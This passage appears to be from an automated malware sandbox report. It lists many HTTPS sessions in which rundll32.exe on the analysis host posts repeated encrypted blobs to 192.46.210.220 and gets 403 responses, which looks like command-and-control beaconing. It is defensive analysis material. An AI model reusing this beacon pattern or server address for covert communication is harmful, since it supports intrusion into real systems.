2021-10-28 02:58:59 UTC | 144 | OUT | Data Raw: e3 0b 66 a3 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
    Data Ascii: f'\V?LsBRfoH(iMFVz @*mRk7kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 02:58:59 UTC | 149 | IN | HTTP/1.1 403 Forbidden
    Server: nginx/1.15.12
    Date: Thu, 28 Oct 2021 02:58:59 GMT
    Content-Type: text/plain; charset=utf-8
    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
3 | 192.168.2.6 | 49763 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-28 02:58:07 UTC | 14 | OUT | POST / HTTP/1.1
    Host: 192.46.210.220
    Content-Length: 4850
    Connection: Close
    Cache-Control: no-cache
2021-10-28 02:58:07 UTC | 15 | OUT | Data Raw: e3 0b 66 a3 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
    Data Ascii: f'\V?LsBRfoH(iMFVz @*mRk7kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 02:58:08 UTC | 19 | IN | HTTP/1.1 403 Forbidden
    Server: nginx/1.15.12
    Date: Thu, 28 Oct 2021 02:58:07 GMT
    Content-Type: text/plain; charset=utf-8
    Connection: close


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
30          192.168.2.6  49884        192.46.210.220  443               C:\Windows\SysWOW64\rundll32.exe

Timestamp                kBytes transferred  Direction  Data
2021-10-28 02:59:01 UTC  149                 OUT        POST / HTTP/1.1
                                                        Host: 192.46.210.220
                                                        Content-Length: 4862
                                                        Connection: Close
                                                        Cache-Control: no-cache
2021-10-28 02:59:01 UTC  149                 OUT        Data Raw: 46 8c 83 6e 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                        Data Ascii: Fn'\V?LsBRfoH(iMFVz @*mRk7k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 02:59:02 UTC  154                 IN         HTTP/1.1 403 Forbidden
                                                        Server: nginx/1.15.12
                                                        Date: Thu, 28 Oct 2021 02:59:02 GMT
                                                        Content-Type: text/plain; charset=utf-8
                                                        Connection: close


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
31          192.168.2.6  49886        192.46.210.220  443               C:\Windows\SysWOW64\rundll32.exe

Timestamp                kBytes transferred  Direction  Data
2021-10-28 02:59:02 UTC  154                 OUT        POST / HTTP/1.1
                                                        Host: 192.46.210.220
                                                        Content-Length: 4850
                                                        Connection: Close
                                                        Cache-Control: no-cache
2021-10-28 02:59:02 UTC  154                 OUT        Data Raw: e3 0b 66 a3 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                        Data Ascii: f'\V?LsBRfoH(iMFVz @*mRk7kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 02:59:03 UTC  159                 IN         HTTP/1.1 403 Forbidden
                                                        Server: nginx/1.15.12
                                                        Date: Thu, 28 Oct 2021 02:59:03 GMT
                                                        Content-Type: text/plain; charset=utf-8
                                                        Connection: close


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
32          192.168.2.6  49892        192.46.210.220  443               C:\Windows\SysWOW64\rundll32.exe

Timestamp                kBytes transferred  Direction  Data
2021-10-28 02:59:05 UTC  159                 OUT        POST / HTTP/1.1
                                                        Host: 192.46.210.220
                                                        Content-Length: 4862
                                                        Connection: Close
                                                        Cache-Control: no-cache
2021-10-28 02:59:05 UTC  159                 OUT        Data Raw: 46 8c 83 6e 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                        Data Ascii: Fn'\V?LsBRfoH(iMFVz @*mRk7k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 02:59:06 UTC  164                 IN         HTTP/1.1 403 Forbidden
                                                        Server: nginx/1.15.12
                                                        Date: Thu, 28 Oct 2021 02:59:06 GMT
                                                        Content-Type: text/plain; charset=utf-8
                                                        Connection: close


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
33          192.168.2.6  49894        192.46.210.220  443               C:\Windows\SysWOW64\rundll32.exe

Timestamp                kBytes transferred  Direction  Data
2021-10-28 02:59:06 UTC  164                 OUT        POST / HTTP/1.1
                                                        Host: 192.46.210.220
                                                        Content-Length: 4850
                                                        Connection: Close
                                                        Cache-Control: no-cache
2021-10-28 02:59:06 UTC  164                 OUT        Data Raw: e3 0b 66 a3 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                        Data Ascii: f'\V?LsBRfoH(iMFVz @*mRk7kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 02:59:07 UTC  169                 IN         HTTP/1.1 403 Forbidden
                                                        Server: nginx/1.15.12
                                                        Date: Thu, 28 Oct 2021 02:59:07 GMT
                                                        Content-Type: text/plain; charset=utf-8
                                                        Connection: close


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
34          192.168.2.6  49901        192.46.210.220  443               C:\Windows\SysWOW64\rundll32.exe

Timestamp                kBytes transferred  Direction  Data
2021-10-28 02:59:09 UTC  169                 OUT        POST / HTTP/1.1
                                                        Host: 192.46.210.220
                                                        Content-Length: 4862
                                                        Connection: Close
                                                        Cache-Control: no-cache
2021-10-28 02:59:09 UTC  169                 OUT        Data Raw: 46 8c 83 6e 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                        Data Ascii: Fn'\V?LsBRfoH(iMFVz @*mRk7k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 02:59:09 UTC  174                 IN         HTTP/1.1 403 Forbidden
                                                        Server: nginx/1.15.12
                                                        Date: Thu, 28 Oct 2021 02:59:09 GMT
                                                        Content-Type: text/plain; charset=utf-8
                                                        Connection: close


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
35          192.168.2.6  49903        192.46.210.220  443               C:\Windows\SysWOW64\rundll32.exe

Timestamp                kBytes transferred  Direction  Data
2021-10-28 02:59:10 UTC  174                 OUT        POST / HTTP/1.1
                                                        Host: 192.46.210.220
                                                        Content-Length: 4850
                                                        Connection: Close
                                                        Cache-Control: no-cache
2021-10-28 02:59:10 UTC  174                 OUT        Data Raw: e3 0b 66 a3 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                        Data Ascii: f'\V?LsBRfoH(iMFVz @*mRk7kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 02:59:11 UTC  179                 IN         HTTP/1.1 403 Forbidden
                                                        Server: nginx/1.15.12
                                                        Date: Thu, 28 Oct 2021 02:59:11 GMT
                                                        Content-Type: text/plain; charset=utf-8
                                                        Connection: close


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
36          192.168.2.6  49909        192.46.210.220  443               C:\Windows\SysWOW64\rundll32.exe

Timestamp                kBytes transferred  Direction  Data
2021-10-28 02:59:13 UTC  179                 OUT        POST / HTTP/1.1
                                                        Host: 192.46.210.220
                                                        Content-Length: 4862
                                                        Connection: Close
                                                        Cache-Control: no-cache
2021-10-28 02:59:13 UTC  179                 OUT        Data Raw: 46 8c 83 6e 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                        Data Ascii: Fn'\V?LsBRfoH(iMFVz @*mRk7k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 02:59:13 UTC  184                 IN         HTTP/1.1 403 Forbidden
                                                        Server: nginx/1.15.12
                                                        Date: Thu, 28 Oct 2021 02:59:13 GMT
                                                        Content-Type: text/plain; charset=utf-8
                                                        Connection: close


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
37          192.168.2.6  49911        192.46.210.220  443               C:\Windows\SysWOW64\rundll32.exe

Timestamp                kBytes transferred  Direction  Data
2021-10-28 02:59:14 UTC  184                 OUT        POST / HTTP/1.1
                                                        Host: 192.46.210.220
                                                        Content-Length: 4850
                                                        Connection: Close
                                                        Cache-Control: no-cache
2021-10-28 02:59:14 UTC  184                 OUT        Data Raw: e3 0b 66 a3 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                        Data Ascii: f'\V?LsBRfoH(iMFVz @*mRk7kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 02:59:15 UTC  189                 IN         HTTP/1.1 403 Forbidden
                                                        Server: nginx/1.15.12
                                                        Date: Thu, 28 Oct 2021 02:59:15 GMT
                                                        Content-Type: text/plain; charset=utf-8
                                                        Connection: close


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
38          192.168.2.6  49917        192.46.210.220  443               C:\Windows\SysWOW64\rundll32.exe

Timestamp                kBytes transferred  Direction  Data
2021-10-28 02:59:17 UTC  189                 OUT        POST / HTTP/1.1
                                                        Host: 192.46.210.220
                                                        Content-Length: 4862
                                                        Connection: Close
                                                        Cache-Control: no-cache
2021-10-28 02:59:17 UTC  189                 OUT        Data Raw: 46 8c 83 6e 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                        Data Ascii: Fn'\V?LsBRfoH(iMFVz @*mRk7k7;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 02:59:17 UTC  194                 IN         HTTP/1.1 403 Forbidden
                                                        Server: nginx/1.15.12
                                                        Date: Thu, 28 Oct 2021 02:59:17 GMT
                                                        Content-Type: text/plain; charset=utf-8
                                                        Connection: close


Session ID  Source IP    Source Port  Destination IP  Destination Port  Process
39          192.168.2.6  49919        192.46.210.220  443               C:\Windows\SysWOW64\rundll32.exe

Timestamp                kBytes transferred  Direction  Data
2021-10-28 02:59:18 UTC  194                 OUT        POST / HTTP/1.1
                                                        Host: 192.46.210.220
                                                        Content-Length: 4850
                                                        Connection: Close
                                                        Cache-Control: no-cache
2021-10-28 02:59:18 UTC  194                 OUT        Data Raw: e3 0b 66 a3 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
                                                        Data Ascii: f'\V?LsBRfoH(iMFVz @*mRk7kV;Sg`Ar1]>pL2LeTc]#*oI+$.{5:Ihkp$3!j_>Zd\uo77pFiA1mS#Qf$Z:`]>hd68'xqz
2021-10-28 02:59:18 UTC  199                 IN         HTTP/1.1 403 Forbidden
                                                        Server: nginx/1.15.12
                                                        Date: Thu, 28 Oct 2021 02:59:18 GMT
                                                        Content-Type: text/plain; charset=utf-8
                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        4192.168.2.649767192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        2021-10-28 02:58:08 UTC19OUTPOST / HTTP/1.1
                                                                                                        Host: 192.46.210.220
                                                                                                        Content-Length: 4862
                                                                                                        Connection: Close
                                                                                                        Cache-Control: no-cache
                                                                                                        2021-10-28 02:58:08 UTC20OUTData Raw: 46 8c 83 6e 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
2021-10-28 02:58:09 UTC | 24 | IN | HTTP/1.1 403 Forbidden
    Server: nginx/1.15.12
    Date: Thu, 28 Oct 2021 02:58:09 GMT
    Content-Type: text/plain; charset=utf-8
    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
40 | 192.168.2.6 | 49925 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe

Timestamp | kBytes transferred | Direction | Data
2021-10-28 02:59:21 UTC | 199 | OUT | POST / HTTP/1.1
    Host: 192.46.210.220
    Content-Length: 4862
    Connection: Close
    Cache-Control: no-cache
2021-10-28 02:59:21 UTC | 199 | OUT | Data Raw: 46 8c 83 6e 10 08 27 a5 5c b0 56 a3 18 3f 4c 94 e5 ad 73 ac f8 a8 f0 12 06 42 87 c9 8b 52 90 1a a4 a0 eb 66 6f 05 8b e5 cd f9 f4 b2 d6 48 9d 88 af e2 28 69 90 0b 4d 46 56 7a df 0f 20 40 2a f7 6d aa 9c 52 11 f1 6b 95 08 e9 d6 37 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 72 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 8f 05 fc 7b 03 b4 c5 35 3a b3 94 49 02 cb 9a 68 0a cf 6b b4 a2 ec e5 70 19 be 24 33 21 16 fe 6a 9c 5f a5 01 08 3e 5a 82 64 5c 75 b1 cc 6f fd 37 0c 85 1b b4 e9 c8 37 cc f0 0a a2 70 be f7 bb c5 89 e5 e1 46 d0 8d d5 1e 0a 93 8c 69 b6 41 f8 08 31 ff 6d d6 53 23 ed 8f cb 18 51 e2 66 24 5a 3a 93 1b 60 5d a3 3e 82 87 68 64 fe 36 9c a8 38 b1 94 8e fc 27 01 89 00 f2 78 71 a6 14 7a
2021-10-28 02:59:21 UTC | 204 | IN | HTTP/1.1 403 Forbidden
    Server: nginx/1.15.12
    Date: Thu, 28 Oct 2021 02:59:21 GMT
    Content-Type: text/plain; charset=utf-8
    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
41 | 192.168.2.6 | 49927 | 192.46.210.220 | 443 | C:\Windows\SysWOW64\rundll32.exe

Timestamp | kBytes transferred | Direction | Data
2021-10-28 02:59:22 UTC | 204 | OUT | POST / HTTP/1.1
    Host: 192.46.210.220
    Content-Length: 4850
    Connection: Close
    Cache-Control: no-cache
